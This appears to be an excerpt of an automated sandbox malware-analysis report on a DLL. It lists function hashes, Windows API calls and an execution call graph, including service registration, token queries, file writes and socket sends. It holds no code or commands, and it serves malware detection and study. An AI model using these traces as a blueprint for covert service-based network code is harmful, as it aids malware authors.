                              • Opcode Fuzzy Hash: 3a796c32a1ce250fe0e2ef0422a22b2cdcb733c9b7f94d41a40a67be8ccbe9bf
                              • Instruction Fuzzy Hash: 82D09EB6B28209DBAF49CF59D45281D77FCF346354740426EEA1AC7304D732A8128BD8
                              Function 6CD52680 Relevance: 7.6, APIs: 5, Instructions: 63fileCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              APIs
                              • CreateFileW.KERNEL32(00000000,6CD7835C,00000016,F6A49D28,6CD81084,40000000,00000001,00000000,00000004,00000000,00000000), ref: 6CD526DB
                              • GetLastError.KERNEL32 ref: 6CD52713
                              • SetFilePointer.KERNEL32(000000FF,00000000,00000000,00000002), ref: 6CD52725
                              • WriteFile.KERNEL32(000000FF,?,?,?,00000000), ref: 6CD5273D
                              • CloseHandle.KERNEL32(000000FF), ref: 6CD52747
                              Memory Dump Source
                              • Source File: 00000000.00000002.3965060253.000000006CD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CD50000, based on PE: true
                              • Associated: 00000000.00000002.3965019494.000000006CD50000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3965111619.000000006CD78000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3965139534.000000006CD7D000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3965198382.000000006CDD7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3965233663.000000006CDEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_6cd50000_loaddll32.jbxd
                              Similarity
                              • API ID: File$CloseCreateErrorHandleLastPointerWrite
                              • String ID:
                              • API String ID: 170361235-0
                              • Opcode ID: a496d619c835c7e43a0b919234d6636ae76c08fb0e7d2e8cc643519b85aa9907
                              • Instruction ID: 3f1f36d020c915cd592e4e3ecba8d4696b71eb4a9c80d4df09b741fc4652f337
                              • Opcode Fuzzy Hash: a496d619c835c7e43a0b919234d6636ae76c08fb0e7d2e8cc643519b85aa9907
                              • Instruction Fuzzy Hash: 8E219070B10204AFEF14DFA4CD4AF9937B8AB46704F50811AF705AB6D0DB30A9058BA0
                              Function 6CD6E650 Relevance: 6.1, APIs: 4, Instructions: 74COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 463 6cd6e650-6cd6e689 call 6cd535b0 * 4 472 6cd6e6bf-6cd6e6c6 463->472 473 6cd6e68b-6cd6e69d 463->473 474 6cd6e6fd-6cd6e704 472->474 475 6cd6e6c8-6cd6e6db 472->475 476 6cd6e6ae 473->476 477 6cd6e69f-6cd6e6ac call 6cd6ea20 473->477 480 6cd6e706-6cd6e719 474->480 481 6cd6e73b-6cd6e742 474->481 478 6cd6e6ec 475->478 479 6cd6e6dd-6cd6e6ea call 6cd6ea20 475->479 483 6cd6e6b5 476->483 477->483 485 6cd6e6f3 478->485 479->485 486 6cd6e72a 480->486 487 6cd6e71b-6cd6e728 call 6cd6ea20 480->487 489 6cd6e744-6cd6e756 481->489 490 6cd6e778-6cd6e77b 481->490 483->472 485->474 495 6cd6e731 486->495 487->495 491 6cd6e767 489->491 492 6cd6e758-6cd6e765 call 6cd6ea20 489->492 497 6cd6e76e 491->497 492->497 495->481 497->490
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.3965060253.000000006CD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CD50000, based on PE: true
                              • Associated: 00000000.00000002.3965019494.000000006CD50000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3965111619.000000006CD78000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3965139534.000000006CD7D000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3965198382.000000006CDD7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3965233663.000000006CDEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_6cd50000_loaddll32.jbxd
                              Similarity
                              • API ID: codecvt
                              • String ID:
                              • API String ID: 3662085145-0
                              • Opcode ID: 37320b71a7be83556b002174ec9fc3dd33e1032fb330f3e4f87ae76041f4c033
                              • Instruction ID: 646a2e5a06cecb3fb507baee41b3abc8541b517d25ab7457d06c7c1104f644e0
                              • Opcode Fuzzy Hash: 37320b71a7be83556b002174ec9fc3dd33e1032fb330f3e4f87ae76041f4c033
                              • Instruction Fuzzy Hash: 6431C678A0120ADFEB04EF95D994BADB7BABB95308F104419D62137FA0D7752A84CF90

                              Execution Graph

                              Execution Coverage:8.4%
                              Dynamic/Decrypted Code Coverage:0%
                              Signature Coverage:1.3%
                              Total number of Nodes:1175
                              Total number of Limit Nodes:127
                              execution_graph 21812 6cd54eb3 31 API calls 21813 6cd5d4db LoadLibraryA LoadLibraryA LoadLibraryA RegCreateKeyExW WSASend 21816 6cd74ec0 Sleep LoadLibraryA LoadLibraryA LoadLibraryA FindCloseChangeNotification 21827 6cd5eaf9 5 API calls codecvt 21830 6cd66ae2 10 API calls 21831 6cd53ee0 RtlAllocateHeap RtlFreeHeap LoadLibraryA LoadLibraryA LoadLibraryA 21832 6cd518e0 13 API calls 21833 6cd6b6e0 5 API calls codecvt 21547 6cd51880 21548 6cd5188e 21547->21548 21549 6cd518b5 21548->21549 21550 6cd518c4 21548->21550 21552 6cd518bb 21549->21552 21554 6cd51090 21549->21554 21569 6cd510c0 6 API calls 21550->21569 21570 6cd51000 21554->21570 21562 6cd510a7 21628 6cd6eb60 21562->21628 21566 6cd510b1 21636 6cd6e330 21566->21636 21568 6cd510bb 21568->21552 21569->21552 21572 6cd51016 21570->21572 21571 6cd51025 GetTickCount Sleep GetTickCount 21571->21572 21572->21571 21573 6cd51055 21572->21573 21574 6cd528e0 21573->21574 21575 6cd528f4 codecvt 21574->21575 21576 6cd531d0 codecvt 3 API calls 21575->21576 21577 6cd52950 codecvt 21576->21577 21578 6cd531d0 codecvt 3 API calls 21577->21578 21579 6cd52998 codecvt 21578->21579 21580 6cd52080 3 API calls 21579->21580 21581 6cd529c3 21580->21581 21582 6cd52080 3 API calls 21581->21582 21583 6cd529c8 21582->21583 21584 6cd52080 3 API calls 21583->21584 21585 6cd5109d 21584->21585 21586 6cd64120 21585->21586 21590 6cd64154 21586->21590 21587 6cd60a90 3 API calls 21588 6cd6420c 21587->21588 21661 6cd66130 21588->21661 21590->21587 21591 6cd64235 21665 6cd66190 21591->21665 21593 6cd64244 21594 6cd53db0 5 API calls 21593->21594 21595 6cd6424c 21594->21595 21669 6cd648b0 21595->21669 21598 6cd6426c 21705 6cd661f0 21598->21705 21600 6cd51f20 3 API calls 21600->21598 21601 6cd64282 21602 6cd661f0 3 API calls 21601->21602 21603 6cd64297 21602->21603 21604 6cd53fb0 4 API calls 21603->21604 21605 6cd510a2 21604->21605 21606 6cd70870 21605->21606 21607 6cd53810 3 API calls 21606->21607 21608 6cd7088a codecvt 21607->21608 21609 6cd56da0 3 API calls 21608->21609 21610 6cd708de codecvt 21609->21610 21612 6cd70b61 codecvt 21610->21612 21613 6cd708ff codecvt 21610->21613 21611 6cd70b57 codecvt 21611->21562 21612->21611 21724 6cd71790 LoadLibraryA LoadLibraryA LoadLibraryA codecvt 21612->21724 21614 6cd51f20 3 API calls 21613->21614 21616 6cd70a0e codecvt 21614->21616 21617 6cd51f20 3 API calls 21616->21617 21618 6cd70a41 codecvt 21617->21618 21619 6cd51f20 3 API calls 21618->21619 21620 6cd70a74 codecvt 21619->21620 21621 6cd51f20 3 API calls 21620->21621 21622 6cd70aa7 codecvt 21621->21622 21721 6cd71800 LoadLibraryA LoadLibraryA LoadLibraryA codecvt 21622->21721 21624 6cd70af1 codecvt 21722 6cd71800 LoadLibraryA LoadLibraryA LoadLibraryA codecvt 21624->21722 21626 6cd70b24 codecvt 21723 6cd71800 LoadLibraryA LoadLibraryA LoadLibraryA codecvt 21626->21723 21725 6cd6ee00 21628->21725 21630 6cd6eb68 21729 6cd6ee60 21630->21729 21632 6cd510ac 21633 6cd68f80 21632->21633 21733 6cd69e90 21633->21733 21637 6cd52550 4 API calls 21636->21637 21638 6cd6e346 21637->21638 21639 6cd6e35a 21638->21639 21796 6cd53270 21638->21796 21641 6cd52550 4 API calls 21639->21641 21642 6cd6e382 21641->21642 21643 6cd6e396 21642->21643 21644 6cd53270 4 API calls 21642->21644 21645 6cd52550 4 API calls 21643->21645 21644->21643 21646 6cd6e3bd 21645->21646 21647 6cd6e3d1 21646->21647 21648 6cd53270 4 API calls 21646->21648 21649 6cd52550 4 API calls 21647->21649 21648->21647 21650 6cd6e3fa 21649->21650 21651 6cd53270 4 API calls 21650->21651 21652 6cd6e40e codecvt 21650->21652 21651->21652 21800 6cd53390 LoadLibraryA LoadLibraryA LoadLibraryA GetProcAddress 21652->21800 21654 6cd6e49e codecvt 21801 6cd53390 LoadLibraryA LoadLibraryA LoadLibraryA GetProcAddress 21654->21801 21656 6cd6e524 codecvt 21802 6cd53390 LoadLibraryA LoadLibraryA LoadLibraryA GetProcAddress 21656->21802 21658 6cd6e5a9 codecvt 21803 6cd53390 LoadLibraryA LoadLibraryA LoadLibraryA GetProcAddress 21658->21803 21660 6cd6e632 codecvt 21660->21568 21662 6cd6613f codecvt 21661->21662 21664 6cd6616a codecvt 21661->21664 21663 6cd531d0 codecvt 3 API calls 21662->21663 21663->21664 21664->21591 21666 6cd6619f codecvt 21665->21666 21668 6cd661ca codecvt 21665->21668 21667 6cd531d0 codecvt 3 API calls 21666->21667 21667->21668 21668->21593 21709 6cd58ea0 21669->21709 21671 6cd648d8 21672 6cd648e6 21671->21672 21673 6cd648dc 21671->21673 21675 6cd64943 21672->21675 21678 6cd648f8 21672->21678 21674 6cd52080 3 API calls 21673->21674 21677 6cd64257 21674->21677 21676 6cd649a0 21675->21676 21680 6cd64955 21675->21680 21679 6cd649fd 21676->21679 21682 6cd649b2 21676->21682 21677->21598 21677->21600 21681 6cd54150 5 API calls 21678->21681 21684 6cd64a57 21679->21684 21686 6cd64a0f 21679->21686 21683 6cd54150 5 API calls 21680->21683 21688 6cd64907 codecvt 21681->21688 21685 6cd54150 5 API calls 21682->21685 21690 6cd64964 codecvt 21683->21690 21684->21677 21689 6cd54150 5 API calls 21684->21689 21691 6cd649c1 codecvt 21685->21691 21687 6cd54150 5 API calls 21686->21687 21693 6cd64a1e codecvt 21687->21693 21713 6cd54350 RtlAllocateHeap RtlFreeHeap LoadLibraryA LoadLibraryA LoadLibraryA 21688->21713 21695 6cd64a78 codecvt 21689->21695 21714 6cd54350 RtlAllocateHeap RtlFreeHeap LoadLibraryA LoadLibraryA LoadLibraryA 21690->21714 21715 6cd54350 RtlAllocateHeap RtlFreeHeap LoadLibraryA LoadLibraryA LoadLibraryA 21691->21715 21716 6cd54350 RtlAllocateHeap RtlFreeHeap LoadLibraryA LoadLibraryA LoadLibraryA 21693->21716 21717 6cd54350 RtlAllocateHeap RtlFreeHeap LoadLibraryA LoadLibraryA LoadLibraryA 21695->21717 21699 6cd64933 codecvt 21718 6cd65370 LoadLibraryA LoadLibraryA LoadLibraryA 21699->21718 21701 6cd64ac3 codecvt 21701->21677 21719 6cd54350 RtlAllocateHeap RtlFreeHeap LoadLibraryA LoadLibraryA LoadLibraryA 21701->21719 21703 6cd64b0f codecvt 21720 6cd54350 RtlAllocateHeap RtlFreeHeap LoadLibraryA LoadLibraryA LoadLibraryA 21703->21720 21706 6cd6622a codecvt 21705->21706 21707 6cd661ff codecvt 21705->21707 21706->21601 21708 6cd531d0 codecvt 3 API calls 21707->21708 21708->21706 21710 6cd58eaf codecvt 21709->21710 21711 6cd58eda codecvt 21709->21711 21712 6cd531d0 codecvt 3 API calls 21710->21712 21711->21671 21712->21711 21713->21699 21714->21699 21715->21699 21716->21699 21717->21699 21718->21701 21719->21703 21720->21677 21721->21624 21722->21626 21723->21611 21724->21611 21726 6cd6ee3a codecvt 21725->21726 21727 6cd6ee0f codecvt 21725->21727 21726->21630 21728 6cd531d0 codecvt 3 API calls 21727->21728 21728->21726 21730 6cd6ee9a codecvt 21729->21730 21731 6cd6ee6f codecvt 21729->21731 21730->21632 21732 6cd531d0 codecvt 3 API calls 21731->21732 21732->21730 21734 6cd548d0 3 API calls 21733->21734 21735 6cd69ea7 codecvt 21734->21735 21736 6cd523f0 4 API calls 21735->21736 21737 6cd69f09 codecvt 21736->21737 21738 6cd68f88 21737->21738 21739 6cd53db0 5 API calls 21737->21739 21738->21566 21740 6cd69f2f 21739->21740 21741 6cd52520 5 API calls 21740->21741 21742 6cd69f52 codecvt 21741->21742 21784 6cd54350 RtlAllocateHeap RtlFreeHeap LoadLibraryA LoadLibraryA LoadLibraryA 21742->21784 21744 6cd69f92 codecvt 21745 6cd53db0 5 API calls 21744->21745 21746 6cd69fb8 codecvt 21745->21746 21747 6cd542e0 5 API calls 21746->21747 21748 6cd69ffd codecvt 21747->21748 21785 6cd54350 RtlAllocateHeap RtlFreeHeap LoadLibraryA LoadLibraryA LoadLibraryA 21748->21785 21750 6cd6a03e codecvt 21786 6cd54350 RtlAllocateHeap RtlFreeHeap LoadLibraryA LoadLibraryA LoadLibraryA 21750->21786 21752 6cd6a062 codecvt 21787 6cd54350 RtlAllocateHeap RtlFreeHeap LoadLibraryA LoadLibraryA LoadLibraryA 21752->21787 21754 6cd6a09b codecvt 21788 6cd54350 RtlAllocateHeap RtlFreeHeap LoadLibraryA LoadLibraryA LoadLibraryA 21754->21788 21756 6cd6a0b2 codecvt 21789 6cd54350 RtlAllocateHeap RtlFreeHeap LoadLibraryA LoadLibraryA LoadLibraryA 21756->21789 21758 6cd6a0de codecvt 21790 6cd54350 RtlAllocateHeap RtlFreeHeap LoadLibraryA LoadLibraryA LoadLibraryA 21758->21790 21760 6cd6a115 codecvt 21791 6cd54350 RtlAllocateHeap RtlFreeHeap LoadLibraryA LoadLibraryA LoadLibraryA 21760->21791 21762 6cd6a14c codecvt 21792 6cd54350 RtlAllocateHeap RtlFreeHeap LoadLibraryA LoadLibraryA LoadLibraryA 21762->21792 21764 6cd6a183 codecvt 21765 6cd54860 3 API calls 21764->21765 21766 6cd6a19b 21765->21766 21767 6cd54860 3 API calls 21766->21767 21768 6cd6a1ab 21767->21768 21793 6cd574f0 LoadLibraryA LoadLibraryA LoadLibraryA codecvt 21768->21793 21770 6cd6a1eb 21771 6cd6a1fa 21770->21771 21772 6cd56f30 codecvt 4 API calls 21770->21772 21773 6cd6a210 21771->21773 21774 6cd56f30 codecvt 4 API calls 21771->21774 21772->21771 21775 6cd521b0 3 API calls 21773->21775 21774->21773 21776 6cd6a21e 21775->21776 21794 6cd52270 LoadLibraryA LoadLibraryA LoadLibraryA codecvt 21776->21794 21778 6cd6a224 21779 6cd6a22f 21778->21779 21795 6cd52390 LoadLibraryA LoadLibraryA LoadLibraryA codecvt 21778->21795 21781 6cd53fb0 4 API calls 21779->21781 21782 6cd6a237 21781->21782 21783 6cd53fb0 4 API calls 21782->21783 21783->21738 21784->21744 21785->21750 21786->21752 21787->21754 21788->21756 21789->21758 21790->21760 21791->21762 21792->21764 21793->21770 21794->21778 21795->21779 21797 6cd53281 21796->21797 21798 6cd536c0 4 API calls 21797->21798 21799 6cd532af 21798->21799 21799->21639 21800->21654 21801->21656 21802->21658 21803->21660 21841 6cd52680 5 API calls codecvt 21847 6cd62ab0 7 API calls codecvt 21859 6cd6f450 7 API calls codecvt 21860 6cd61e50 LoadLibraryA LoadLibraryA LoadLibraryA VirtualFree codecvt 21861 6cd68451 Sleep LoadLibraryA LoadLibraryA LoadLibraryA 21865 6cd57e45 7 API calls codecvt 21866 6cd5ba44 RtlFreeHeap LoadLibraryA LoadLibraryA LoadLibraryA WSASend 21867 6cd6aa40 8 API calls 21876 6cd60c62 LoadLibraryA LoadLibraryA LoadLibraryA WSASend WSARecv 21882 6cd71e6b LoadLibraryA LoadLibraryA LoadLibraryA shutdown 21536 6cd64010 21537 6cd6404a codecvt 21536->21537 21538 6cd6401f codecvt 21536->21538 21539 6cd531d0 codecvt 3 API calls 21538->21539 21539->21537 21805 6cd6c20c 31 API calls 21894 6cd51430 LoadLibraryA LoadLibraryA LoadLibraryA 21544 6cd6903e 7 API calls codecvt 21901 6cd52620 RtlFreeHeap LoadLibraryA LoadLibraryA LoadLibraryA codecvt 21902 6cd5f220 6 API calls codecvt 21808 6cd74028 8 API calls codecvt 21907 6cd761dd 6 API calls 21804 6cd64fc3 LoadLibraryA LoadLibraryA LoadLibraryA FindCloseChangeNotification codecvt 21914 6cd637f0 6 API calls 21545 6cd75bff LoadLibraryA LoadLibraryA LoadLibraryA shutdown 21924 6cd597ee 8 API calls codecvt 21927 6cd55d90 LoadLibraryA LoadLibraryA LoadLibraryA WSASend 21540 6cd63fb0 21541 6cd63fea codecvt 21540->21541 21542 6cd63fbf codecvt 21540->21542 21543 6cd531d0 codecvt 3 API calls 21542->21543 21543->21541 21951 6cd673af 6 API calls codecvt 21952 6cd67557 Sleep RtlFreeHeap LoadLibraryA LoadLibraryA LoadLibraryA 21955 6cd77150 6 API calls codecvt 20368 6cd51770 20369 6cd51787 codecvt 20368->20369 20398 6cd51f20 20369->20398 20371 6cd517cd codecvt 20402 6cd51ff0 20371->20402 20381 6cd5180b 20448 6cd51390 20381->20448 20387 6cd5182e 20388 6cd52210 4 API calls 20387->20388 20389 6cd51838 20388->20389 20390 6cd52210 4 API calls 20389->20390 20391 6cd51842 20390->20391 20392 6cd51390 3 API calls 20391->20392 20393 6cd5184f 20392->20393 20394 6cd51ff0 3 API calls 20393->20394 20395 6cd51856 20394->20395 20488 6cd53fb0 20395->20488 20399 6cd51f5a codecvt 20398->20399 20400 6cd51f2f codecvt 20398->20400 20399->20371 20492 6cd531d0 20400->20492 20505 6cd52020 20402->20505 20404 6cd52004 20406 6cd517df 20404->20406 20509 6cd52080 20404->20509 20407 6cd515b0 20406->20407 20408 6cd515c7 20407->20408 20513 6cd52330 20408->20513 20410 6cd515f2 20517 6cd52450 20410->20517 20412 6cd51601 20436 6cd53db0 20412->20436 20413 6cd515f8 codecvt 20413->20412 20521 6cd523f0 20413->20521 20415 6cd51638 codecvt 20416 6cd51652 20415->20416 20419 6cd5165c codecvt 20415->20419 20554 6cd51490 10 API calls 20416->20554 20418 6cd51657 20556 6cd522d0 LoadLibraryA LoadLibraryA LoadLibraryA codecvt 20418->20556 20421 6cd523f0 4 API calls 20419->20421 20423 6cd51689 codecvt 20421->20423 20422 6cd51756 20557 6cd52390 LoadLibraryA LoadLibraryA LoadLibraryA codecvt 20422->20557 20425 6cd516a3 20423->20425 20427 6cd516ad codecvt 20423->20427 20555 6cd514e0 9 API calls 20425->20555 20428 6cd523f0 4 API calls 20427->20428 20429 6cd516da codecvt 20428->20429 20430 6cd516f4 20429->20430 20432 6cd516fb codecvt 20429->20432 20526 6cd510f0 20430->20526 20433 6cd523f0 4 API calls 20432->20433 20434 6cd51728 codecvt 20433->20434 20434->20412 20435 6cd51250 34 API calls 20434->20435 20435->20418 20437 6cd53dc1 20436->20437 20438 6cd53ff0 5 API calls 20437->20438 20439 6cd517ef 20438->20439 20440 6cd52520 20439->20440 20706 6cd542e0 20440->20706 20443 6cd524b0 20444 6cd524fa RegisterServiceCtrlHandlerExW 20443->20444 20445 6cd524bf codecvt 20443->20445 20444->20381 20446 6cd531d0 codecvt 3 API calls 20445->20446 20447 6cd524ea codecvt 20446->20447 20447->20444 20449 6cd513e6 20448->20449 20723 6cd52150 20449->20723 20451 6cd51429 20452 6cd51250 20451->20452 20453 6cd68fb0 7 API calls 20452->20453 20454 6cd5126e 20453->20454 20455 6cd75b30 4 API calls 20454->20455 20456 6cd51276 codecvt 20455->20456 20727 6cd64f90 20456->20727 20458 6cd5129e codecvt 20459 6cd64f90 6 API calls 20458->20459 20460 6cd512d4 codecvt 20459->20460 20746 6cd634b0 20460->20746 20466 6cd51309 20796 6cd6f070 31 API calls 20466->20796 20468 6cd51362 20799 6cd63570 LoadLibraryA LoadLibraryA LoadLibraryA FindCloseChangeNotification codecvt 20468->20799 20471 6cd51367 20800 6cd71ff0 5 API calls codecvt 20471->20800 20474 6cd51302 20474->20468 20790 6cd6bbe0 20474->20790 20797 6cd520e0 LoadLibraryA LoadLibraryA LoadLibraryA codecvt 20474->20797 20798 6cd6bc90 LoadLibraryA LoadLibraryA LoadLibraryA FindCloseChangeNotification codecvt 20474->20798 20475 6cd5136c 20476 6cd51372 20475->20476 20801 6cd6f1f0 5 API calls codecvt 20475->20801 20803 6cd75b70 LoadLibraryA LoadLibraryA LoadLibraryA 20476->20803 20480 6cd51379 20802 6cd704e0 LoadLibraryA LoadLibraryA LoadLibraryA FindCloseChangeNotification codecvt 20480->20802 20482 6cd51383 20483 6cd52210 20482->20483 20484 6cd5225a Sleep 20483->20484 20485 6cd5221f codecvt 20483->20485 20484->20387 20486 6cd531d0 codecvt 3 API calls 20485->20486 20487 6cd5224a codecvt 20486->20487 20487->20484 20489 6cd51868 20488->20489 20490 6cd53fc9 20488->20490 20491 6cd525e0 codecvt 4 API calls 20490->20491 20491->20489 20495 6cd52c90 20492->20495 20494 6cd531ee 20494->20399 20496 6cd52ca3 20495->20496 20497 6cd52e57 20496->20497 20498 6cd52e1e codecvt 20496->20498 20500 6cd52cc6 codecvt 20496->20500 20497->20500 20501 6cd52f68 codecvt 20497->20501 20503 6cd52fa1 codecvt 20497->20503 20499 6cd52e3e LoadLibraryA 20498->20499 20499->20500 20500->20494 20502 6cd52f88 LoadLibraryA 20501->20502 20502->20500 20503->20500 20504 6cd5304e LoadLibraryA 20503->20504 20504->20500 20506 6cd5202f codecvt 20505->20506 20508 6cd5205a codecvt 20505->20508 20507 6cd531d0 codecvt 3 API calls 20506->20507 20507->20508 20508->20404 20510 6cd520ba codecvt 20509->20510 20511 6cd5208f codecvt 20509->20511 20510->20406 20512 6cd531d0 codecvt 3 API calls 20511->20512 20512->20510 20514 6cd5233f codecvt 20513->20514 20515 6cd5236a codecvt 20513->20515 20516 6cd531d0 codecvt 3 API calls 20514->20516 20515->20410 20516->20515 20518 6cd5245f codecvt 20517->20518 20520 6cd5248a codecvt 20517->20520 20519 6cd531d0 codecvt 3 API calls 20518->20519 20519->20520 20520->20413 20522 6cd5243a lstrcmpiW 20521->20522 20523 6cd523ff codecvt 20521->20523 20522->20415 20524 6cd531d0 codecvt 3 API calls 20523->20524 20525 6cd5242a codecvt 20524->20525 20525->20522 20527 6cd5113b codecvt 20526->20527 20528 6cd51f20 3 API calls 20527->20528 20529 6cd5114d codecvt 20528->20529 20530 6cd51ff0 3 API calls 20529->20530 20531 6cd51180 20530->20531 20558 6cd68fb0 20531->20558 20537 6cd511f0 20538 6cd511fe 20537->20538 20617 6cd771d0 LoadLibraryA LoadLibraryA LoadLibraryA 20537->20617 20597 6cd6a9d0 20538->20597 20543 6cd5120e 20611 6cd6ab80 20543->20611 20547 6cd51225 20548 6cd51230 20547->20548 20622 6cd771d0 LoadLibraryA LoadLibraryA LoadLibraryA 20547->20622 20623 6cd704e0 LoadLibraryA LoadLibraryA LoadLibraryA FindCloseChangeNotification codecvt 20548->20623 20551 6cd51238 20624 6cd75b70 LoadLibraryA LoadLibraryA LoadLibraryA 20551->20624 20553 6cd51240 20553->20418 20554->20418 20555->20418 20556->20422 20557->20412 20559 6cd53db0 5 API calls 20558->20559 20560 6cd68fe3 20559->20560 20625 6cd521b0 20560->20625 20562 6cd69027 20629 6cd664a0 20562->20629 20564 6cd6902d 20565 6cd69031 20564->20565 20566 6cd6904a 20564->20566 20568 6cd52080 3 API calls 20565->20568 20633 6cd66730 20566->20633 20583 6cd69036 20568->20583 20569 6cd6905d 20570 6cd69078 20569->20570 20571 6cd52080 3 API calls 20569->20571 20638 6cd53ff0 20570->20638 20575 6cd69066 20571->20575 20573 6cd69145 20574 6cd53fb0 4 API calls 20573->20574 20578 6cd511b4 20574->20578 20575->20570 20579 6cd6906b 20575->20579 20585 6cd75b30 20578->20585 20581 6cd52080 3 API calls 20579->20581 20580 6cd66730 4 API calls 20582 6cd690a0 20580->20582 20581->20583 20582->20583 20584 6cd52080 3 API calls 20582->20584 20583->20573 20648 6cd56f30 20583->20648 20584->20583 20681 6cd72d80 20585->20681 20587 6cd75b3e 20588 6cd72d80 3 API calls 20587->20588 20589 6cd75b43 20588->20589 20590 6cd72d80 3 API calls 20589->20590 20591 6cd75b48 20590->20591 20685 6cd76cd0 20591->20685 20593 6cd75b59 20594 6cd511cf 20593->20594 20595 6cd72d80 3 API calls 20593->20595 20596 6cd70440 31 API calls 20594->20596 20595->20594 20596->20537 20598 6cd6aa03 codecvt 20597->20598 20690 6cd63d10 20598->20690 20600 6cd6aa12 codecvt 20601 6cd6aa36 20600->20601 20602 6cd6aa54 20600->20602 20603 6cd52080 3 API calls 20601->20603 20695 6cd63e70 20602->20695 20609 6cd51206 20603->20609 20605 6cd6aa6e 20606 6cd68fb0 7 API calls 20605->20606 20607 6cd6aab3 20606->20607 20607->20609 20700 6cd6b7f0 LoadLibraryA LoadLibraryA LoadLibraryA codecvt 20607->20700 20610 6cd6ab40 LoadLibraryA LoadLibraryA LoadLibraryA 20609->20610 20610->20543 20612 6cd6ab9c 20611->20612 20613 6cd6ab91 20611->20613 20701 6cd63e10 20612->20701 20705 6cd6b8d0 LoadLibraryA LoadLibraryA LoadLibraryA codecvt 20613->20705 20616 6cd51216 20618 6cd51f80 20616->20618 20617->20538 20619 6cd51fba codecvt 20618->20619 20620 6cd51f8f codecvt 20618->20620 20619->20547 20621 6cd531d0 codecvt 3 API calls 20620->20621 20621->20619 20622->20548 20623->20551 20624->20553 20626 6cd521ea codecvt 20625->20626 20627 6cd521bf codecvt 20625->20627 20626->20562 20628 6cd531d0 codecvt 3 API calls 20627->20628 20628->20626 20630 6cd664da codecvt 20629->20630 20631 6cd664af codecvt 20629->20631 20630->20564 20632 6cd531d0 codecvt 3 API calls 20631->20632 20632->20630 20634 6cd6677a GetTokenInformation 20633->20634 20635 6cd6673f codecvt 20633->20635 20634->20569 20636 6cd531d0 codecvt 3 API calls 20635->20636 20637 6cd6676a codecvt 20636->20637 20637->20634 20639 6cd54011 20638->20639 20640 6cd5400a 20638->20640 20641 6cd5402a 20639->20641 20653 6cd525e0 20639->20653 20640->20580 20658 6cd52550 20641->20658 20646 6cd54070 20647 6cd54860 3 API calls 20646->20647 20647->20640 20649 6cd56f7a FindCloseChangeNotification 20648->20649 20650 6cd56f3f codecvt 20648->20650 20649->20573 20651 6cd531d0 codecvt 3 API calls 20650->20651 20652 6cd56f6a codecvt 20651->20652 20652->20649 20667 6cd52760 20653->20667 20655 6cd525f7 20671 6cd52830 20655->20671 20657 6cd525fd 20657->20641 20659 6cd52760 codecvt 3 API calls 20658->20659 20660 6cd52569 20659->20660 20676 6cd527c0 20660->20676 20662 6cd5256f 20663 6cd54860 20662->20663 20664 6cd5486f codecvt 20663->20664 20666 6cd5489a codecvt 20663->20666 20665 6cd531d0 codecvt 3 API calls 20664->20665 20665->20666 20666->20646 20668 6cd5279a codecvt 20667->20668 20669 6cd5276f codecvt 20667->20669 20668->20655 20670 6cd531d0 codecvt 3 API calls 20669->20670 20670->20668 20672 6cd5287a RtlFreeHeap 20671->20672 20673 6cd5283f codecvt 20671->20673 20672->20657 20674 6cd531d0 codecvt 3 API calls 20673->20674 20675 6cd5286a codecvt 20674->20675 20675->20672 20677 6cd5280a RtlAllocateHeap 20676->20677 20678 6cd527cf codecvt 20676->20678 20677->20662 20679 6cd531d0 codecvt 3 API calls 20678->20679 20680 6cd527fa codecvt 20679->20680 20680->20677 20682 6cd72d8f codecvt 20681->20682 20684 6cd72dba codecvt 20681->20684 20683 6cd531d0 codecvt 3 API calls 20682->20683 20683->20684 20684->20587 20686 6cd76d1a WSAStartup 20685->20686 20687 6cd76cdf codecvt 20685->20687 20686->20593 20688 6cd531d0 codecvt 3 API calls 20687->20688 20689 6cd76d0a codecvt 20688->20689 20689->20686 20691 6cd63d5a CreateWindowExW 20690->20691 20692 6cd63d1f codecvt 20690->20692 20691->20600 20693 6cd531d0 codecvt 3 API calls 20692->20693 20694 6cd63d4a codecvt 20693->20694 20694->20691 20696 6cd63eba SetTimer 20695->20696 20697 6cd63e7f codecvt 20695->20697 20696->20605 20698 6cd531d0 codecvt 3 API calls 20697->20698 20699 6cd63eaa codecvt 20698->20699 20699->20696 20700->20609 20702 6cd63e4a codecvt 20701->20702 20703 6cd63e1f codecvt 20701->20703 20702->20616 20704 6cd531d0 codecvt 3 API calls 20703->20704 20704->20702 20705->20612 20707 6cd542fd 20706->20707 20712 6cd548d0 20707->20712 20709 6cd5431f 20716 6cd54150 20709->20716 20713 6cd548df codecvt 20712->20713 20715 6cd5490a codecvt 20712->20715 20714 6cd531d0 codecvt 3 API calls 20713->20714 20714->20715 20715->20709 20717 6cd54163 20716->20717 20718 6cd53ff0 5 API calls 20717->20718 20719 6cd5418c 20718->20719 20721 6cd517f8 20719->20721 20722 6cd54090 LoadLibraryA LoadLibraryA LoadLibraryA 20719->20722 20721->20443 20722->20721 20724 6cd5218a codecvt 20723->20724 20725 6cd5215f codecvt 20723->20725 20724->20451 20726 6cd531d0 codecvt 3 API calls 20725->20726 20726->20724 20728 6cd521b0 3 API calls 20727->20728 20729 6cd64faf 20728->20729 20730 6cd664a0 3 API calls 20729->20730 20731 6cd64fb5 20730->20731 20732 6cd64fc5 20731->20732 20733 6cd64fb9 20731->20733 20804 6cd66510 20732->20804 20734 6cd52080 3 API calls 20733->20734 20739 6cd64fbe 20734->20739 